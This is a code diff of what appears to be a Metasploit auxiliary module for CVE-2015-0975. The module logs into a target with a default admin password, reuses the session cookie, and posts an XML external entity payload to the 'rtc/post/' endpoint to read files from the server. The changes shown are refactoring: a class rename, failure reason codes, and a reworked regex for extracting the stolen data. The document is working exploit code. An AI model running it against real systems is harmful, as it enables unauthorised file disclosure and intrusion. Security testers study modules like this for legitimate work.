1
1
require 'msf/core'
2
2
require 'openssl'
3
3
4
- class Metasploit3 < Msf ::Auxiliary
4
+ class Metasploit4 < Msf ::Auxiliary
5
5
6
6
include Msf ::Exploit ::Remote ::HttpClient
7
7
@@ -23,13 +23,11 @@ def initialize(info = {})
23
23
admin password of "admin" for security purposes.
24
24
} ,
25
25
'License' => MSF_LICENSE ,
26
- 'Author' =>
27
- [
26
+ 'Author' => [
28
27
'Stephen Breen <breenmachine[at]gmail.com>' , # discovery
29
28
'Justin Kennedy <jstnkndy[at]gmail.com>' , # metasploit module
30
29
] ,
31
- 'References' =>
32
- [
30
+ 'References' => [
33
31
[ 'CVE' , '2015-0975' ]
34
32
] ,
35
33
'DisclosureDate' => 'Jan 08 2015'
@@ -62,20 +60,20 @@ def run
62
60
} )
63
61
64
62
if res . nil?
65
- fail_with ( "No response from POST request" )
63
+ fail_with ( Failure :: Unreachable , "No response from POST request" )
66
64
elsif res . code != 302
67
- fail_with ( "Non-302 response from POST request" )
65
+ fail_with ( Failure :: UnexpectedReply , "Non-302 response from POST request" )
68
66
end
69
67
70
68
unless res . headers [ "Location" ] . include? "index.jsp"
71
- fail_with ( Failure ::Unknown , 'Authentication failed' )
69
+ fail_with ( Failure ::NoAccess , 'Authentication failed' )
72
70
end
73
71
74
72
cookie = res . get_cookies
75
73
76
74
print_status ( "Got cookie, going for the goods" )
77
75
78
- rand_doctype = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
76
+ rand_doctype = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
79
77
rand_entity1 = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
80
78
rand_entity2 = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
81
79
delimiter = SecureRandom . uuid
@@ -88,14 +86,13 @@ def run
88
86
89
87
res = send_request_raw ( {
90
88
'method' => 'POST' ,
91
- 'uri' => normalize_uri ( target_uri . path , 'rtc' , 'post/' ) ,
92
- 'data' => xxe ,
89
+ 'uri' => normalize_uri ( target_uri . path , 'rtc' , 'post/' ) ,
90
+ 'data' => xxe ,
93
91
'cookie' => cookie
94
92
} )
95
93
96
94
# extract filepath data from response
97
-
98
- if res and res . code == 400 and res . message =~ /#{ delimiter } (.+)#{ delimiter } /
95
+ if res && res . code == 400 && res . body =~ /title.+#{ delimiter } (.+)#{ delimiter } .+title/m
99
96
result = $1
100
97
print_good ( "#{ result } " )
101
98
else